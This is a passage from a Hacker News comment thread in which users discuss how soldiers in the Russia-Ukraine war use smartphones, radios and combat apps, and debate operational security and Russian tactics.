          But smartphones are more than communications. You can also use them as artillery computers for firing solutions, for example. And while normally there would be a milspec solution for this purpose, those are usually designed with milspec artillery systems and munitions in mind, while both sides in this war are heavily reliant on stocks that are non-standard (to them) - Ukraine, obviously, with all the Western aid, but Russia also had to dig out a lot of old equipment that was not adequately handled. Apps are much easier to update for this purpose, so they're heavily used in practice (and, again, these are often grassroots developments, not something pushed top-down by brass).

        • By datameta 2025-02-1923:26

          At the start of the invasion in Ukraine it was possible for a while to listen to unencrypted radio comms from Russian convoys, hosted online live.

        • By dmix 2025-02-1920:044 reply

          Russians aren't allowed to bring phones on the frontlines apparently but Ukranians often do still as they have the combat management app which is critical to operations. I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian. Beyond the donation incentive they attached to videos when publishing them on Youtube/Telegram.

          • By merely-unlikely 2025-02-1922:42

            In the first weeks of the war you could see Russian armored columns clearly on Google Maps as heavy traffic (along with other military activity but the columns really stood out). https://www.theverge.com/2022/2/28/22954426/google-disables-...

          • By newsclues 2025-02-1920:33

            Where is the fighting, and who runs the cellular networks in that area?

            I’d want to run military communications on a network my side controls

          • By motorest 2025-02-1921:062 reply

            > I've always wondered if this is why there's far more published footage of Ukranian combat video than Russian.

            I'm sure Russia's meat wave tactics have more of a role. If you're sending your troops in suicide missions, including guys without weapons and even in crutches, you're not exactly too keen in having them carrying mobile phones to document the experience or even, heavens forbid, survive by surrendering.

            • By glowiefedposter 2025-02-2012:29

              [flagged]

            • By MaxPock 2025-02-2010:552 reply

              This meatwave meme needs to die. Again ,if Ukrainians are being beaten by guy in crutches,it says so much about this NATO armed and trained force

              • By motorest 2025-02-2016:36

                > This meatwave meme needs to die.

                Are you sure it's a meme, though? There is plenty of footage out there, documenting meat wave tactics in 4k. Have you been living under a rock?

                > Again ,if Ukrainians are being beaten by guy in crutches (...)

                What's your definition of "being beaten"? Three years into Russia's 3-day invasion of Ukraine and Ukraine started invading and occupying Russian territory. Is this your definition of being beaten?

              • By mikrotikker 2025-02-2011:53

                I'm not sure how applicable the NATO training is in this war. It's a trendsetter for sure

          • By gpderetta 2025-02-1920:43

            I think a large chunk of the footage is taken by gopros or similar, not smartphones.

            And I think a pretty much all published Ukrainian and Russian combat footage is vetted by their respective military (who would want to be court martialed for Reddit karma?).

            They just take different approaches to what, when and were to release the footage.

      • By XorNot 2025-02-205:362 reply

        A radio on a soldier is already a dangerous communications device - with a radio you can call in artillery strikes, for example.

        There's no particular need IMO to secure smartphones on the battlefield in anyway beyond standard counter-measures - i.e. encrypt the storage, use a passcode unlock.

        • By codethief 2025-02-208:561 reply

          The Russian military would beg to differ, see the sibling's comment: https://news.ycombinator.com/item?id=43106162

          • By XorNot 2025-02-2010:47

            That's referring to people literally posting selfies online (with the result of giving away their location by either metadata or geo-guessing).

            Which is a process and procedure issue, more then a security issue on the phones themselves (except in so far as it's really obvious there's a solid need for an OS for a battlefield device which strips all that stuff out by default).

        • By mmooss 2025-02-2022:57

          Smartphones store data; radios (depending on the radio) do not. The Russian military likely has tools for bypassing typical security.

    • By andreygrehov 2025-02-1919:291 reply

      Soldiers are not allowed to carry a cell phone.

HackerNews